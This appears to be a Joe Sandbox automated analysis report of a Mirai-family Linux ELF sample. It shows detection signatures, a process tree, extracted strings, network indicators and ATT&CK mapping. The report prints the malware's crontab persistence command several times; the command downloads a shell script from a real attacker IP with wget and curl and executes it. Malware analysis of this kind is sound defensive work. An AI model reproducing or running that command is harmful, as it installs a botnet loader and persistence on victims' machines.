Edit tour

Linux Analysis Report
m68k.elf

Overview

General Information

Sample name:m68k.elf
Analysis ID:1646360
MD5:22891d6a112648533d76952e9e98ae5b
SHA1:c6436285f1f2dea9739fe6144313729f7e24906f
SHA256:e733ffe0c07dfcc259485b778c7df83af746579436ccb5b09062313f70bfe3b2
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646360
Start date and time:2025-03-23 23:08:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.elf
Detection:MAL
Classification:mal64.troj.linELF@0/48@2/0
  • VT rate limit hit for: http://155.138.230.16/bins/bins.sh;
Command:/tmp/m68k.elf
PID:6315
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • m68k.elf (PID: 6315, Parent: 6235, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.elf
    • m68k.elf New Fork (PID: 6317, Parent: 6315)
      • m68k.elf New Fork (PID: 6319, Parent: 6317)
      • m68k.elf New Fork (PID: 6323, Parent: 6317)
      • m68k.elf New Fork (PID: 6325, Parent: 6317)
      • m68k.elf New Fork (PID: 6327, Parent: 6317)
      • sh (PID: 6327, Parent: 6317, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 6329, Parent: 6327)
          • sh New Fork (PID: 6331, Parent: 6329)
          • crontab (PID: 6331, Parent: 6329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 6332, Parent: 6329)
          • chmod (PID: 6332, Parent: 6329, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 6333, Parent: 6329)
          • sh (PID: 6333, Parent: 6329, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 6334, Parent: 6329)
          • curl (PID: 6334, Parent: 6329, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
        • sh New Fork (PID: 6330, Parent: 6327)
        • crontab (PID: 6330, Parent: 6327, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • dash New Fork (PID: 6380, Parent: 4333)
  • rm (PID: 6380, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpgho
  • dash New Fork (PID: 6381, Parent: 4333)
  • rm (PID: 6381, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpgho
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
m68k.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6319.1.00007febe8001000.00007febe8018000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      6315.1.00007febe8001000.00007febe8018000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: m68k.elfVirustotal: Detection: 17%Perma Link
        Source: m68k.elfReversingLabs: Detection: 22%
        Source: m68k.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
        Source: m68k.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
        Source: m68k.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc

        Networking

        barindex
        Source: global trafficTCP traffic: 155.138.230.16 ports 1290,0,1,2,80,9
        Source: global trafficTCP traffic: 192.168.2.23:59762 -> 155.138.230.16:1290
        Source: /tmp/m68k.elf (PID: 6315)Socket: 127.0.0.1:4161Jump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
        Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
        Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.znet.homes
        Source: m68k.elfString found in binary or memory: http://155.138.230.16/bins/bins.sh;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39254
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 39254 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/m68k.elf (PID: 6319)SIGKILL sent: pid: 6319, result: unknownJump to behavior
        Source: classification engineClassification label: mal64.troj.linELF@0/48@2/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 6331)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 6330)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /bin/curl (PID: 6334)Directory: /root/.curlrcJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1582/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/3088/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/230/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/110/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/231/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/111/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/232/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1579/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/4728/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/112/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/233/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1699/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/113/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/234/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1335/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1698/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/114/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/235/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1334/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1576/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/2302/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/115/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/236/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/116/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/237/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/117/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/118/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/910/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/119/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/912/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/10/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/2307/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/11/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/918/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/12/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/13/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/14/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/15/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/16/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/17/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/18/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1594/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/120/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/121/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1349/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/122/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/243/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/123/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/2/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/124/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/3/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/4/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/125/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/126/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1344/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1465/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1586/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/127/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/6/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/248/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/128/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/249/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1463/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/800/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/9/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/801/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/20/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/21/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1900/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/22/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/23/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/24/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/25/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/26/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/27/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/28/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/29/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/491/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/250/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/130/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/251/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/252/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/132/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/253/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/254/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/255/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/4509/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/256/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1599/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/257/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1477/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/379/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/258/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1476/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/259/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1475/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/936/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/30/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/2208/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/35/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/6267/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/6145/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1809/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6323)File opened: /proc/1494/statJump to behavior
        Source: /tmp/m68k.elf (PID: 6327)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
        Source: /bin/sh (PID: 6332)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
        Source: /usr/bin/dash (PID: 6380)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpghoJump to behavior
        Source: /usr/bin/dash (PID: 6381)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpghoJump to behavior
        Source: /tmp/m68k.elf (PID: 6325)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/m68k.elf (PID: 6325)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/m68k.elf (PID: 6315)Queries kernel information via 'uname': Jump to behavior
        Source: m68k.elf, 6315.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmp, m68k.elf, 6319.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
        Source: m68k.elf, 6315.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmp, m68k.elf, 6319.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmpBinary or memory string: @x86_64/usr/bin/qemu-m68k/tmp/m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.elf
        Source: m68k.elf, 6315.1.00005631f6431000.00005631f64db000.rw-.sdmp, m68k.elf, 6319.1.00005631f6431000.00005631f64db000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
        Source: m68k.elf, 6319.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmpBinary or memory string: /tmp/qemu-open.dS31L0
        Source: m68k.elf, 6319.1.00007ffd58ea7000.00007ffd58ec8000.rw-.sdmpBinary or memory string: 1V/tmp/qemu-open.dS31L0
        Source: m68k.elf, 6315.1.00005631f6431000.00005631f64db000.rw-.sdmp, m68k.elf, 6319.1.00005631f6431000.00005631f64db000.rw-.sdmpBinary or memory string: 1V!/etc/qemu-binfmt/m68k

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: m68k.elf, type: SAMPLE
        Source: Yara matchFile source: 6319.1.00007febe8001000.00007febe8018000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6315.1.00007febe8001000.00007febe8018000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: m68k.elf, type: SAMPLE
        Source: Yara matchFile source: 6319.1.00007febe8001000.00007febe8018000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6315.1.00007febe8001000.00007febe8018000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        File and Directory Permissions Modification
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        File Deletion
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646360 Sample: m68k.elf Startdate: 23/03/2025 Architecture: LINUX Score: 64 40 109.202.202.202, 80 INIT7CH Switzerland 2->40 42 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->42 44 3 other IPs or domains 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected Mirai 2->48 50 Connects to many ports of the same IP (likely port scanning) 2->50 10 m68k.elf 2->10         started        12 dash rm 2->12         started        14 dash rm 2->14         started        signatures3 process4 process5 16 m68k.elf 10->16         started        process6 18 m68k.elf sh 16->18         started        20 m68k.elf 16->20         started        22 m68k.elf 16->22         started        24 m68k.elf 16->24         started        process7 26 sh 18->26         started        28 sh crontab 18->28         started        signatures8 31 sh crontab 26->31         started        34 sh chmod 26->34         started        36 sh sh 26->36         started        38 sh curl 26->38         started        52 Executes the "crontab" command typically for achieving persistence 28->52 process9 signatures10 54 Executes the "crontab" command typically for achieving persistence 31->54
        SourceDetectionScannerLabelLink
        m68k.elf17%VirustotalBrowse
        m68k.elf22%ReversingLabsLinux.Backdoor.Mirai
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://155.138.230.16/bins/bins.sh;100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.znet.homes
        155.138.230.16
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://155.138.230.16/bins/bins.sh;m68k.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          34.249.145.219
          unknownUnited States
          16509AMAZON-02USfalse
          155.138.230.16
          api.znet.homesUnited States
          20473AS-CHOOPAUSfalse
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          34.249.145.219parm5.elfGet hashmaliciousUnknownBrowse
            na.elfGet hashmaliciousPrometeiBrowse
              na.elfGet hashmaliciousPrometeiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      yakuza.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                        yakuza.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          i.elfGet hashmaliciousUnknownBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              155.138.230.16sparc.elfGet hashmaliciousMiraiBrowse
                                armv4l.elfGet hashmaliciousMiraiBrowse
                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                    armv6l.elfGet hashmaliciousMiraiBrowse
                                      sh4.elfGet hashmaliciousMiraiBrowse
                                        i686.elfGet hashmaliciousMiraiBrowse
                                          mips.elfGet hashmaliciousMiraiBrowse
                                            mipsel.elfGet hashmaliciousMiraiBrowse
                                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                              91.189.91.43x86_64.elfGet hashmaliciousMiraiBrowse
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                  mipsel.elfGet hashmaliciousMiraiBrowse
                                                    bot.elfGet hashmaliciousUnknownBrowse
                                                      parm5.elfGet hashmaliciousUnknownBrowse
                                                        pmips.elfGet hashmaliciousMiraiBrowse
                                                          gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.znet.homessparc.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  armv4l.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  AS-CHOOPAUSsparc.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  armv4l.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 155.138.230.16
                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 45.32.1.23
                                                                  xpmg.exeGet hashmaliciousUnknownBrowse
                                                                  • 155.138.150.12
                                                                  CANONICAL-ASGBx86_64.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  owari.arm6.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.125.190.26
                                                                  bot.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  parm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  pmips.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  INIT7CHx86_64.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  bot.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  parm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  pmips.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  AMAZON-02USowari.i686.elfGet hashmaliciousUnknownBrowse
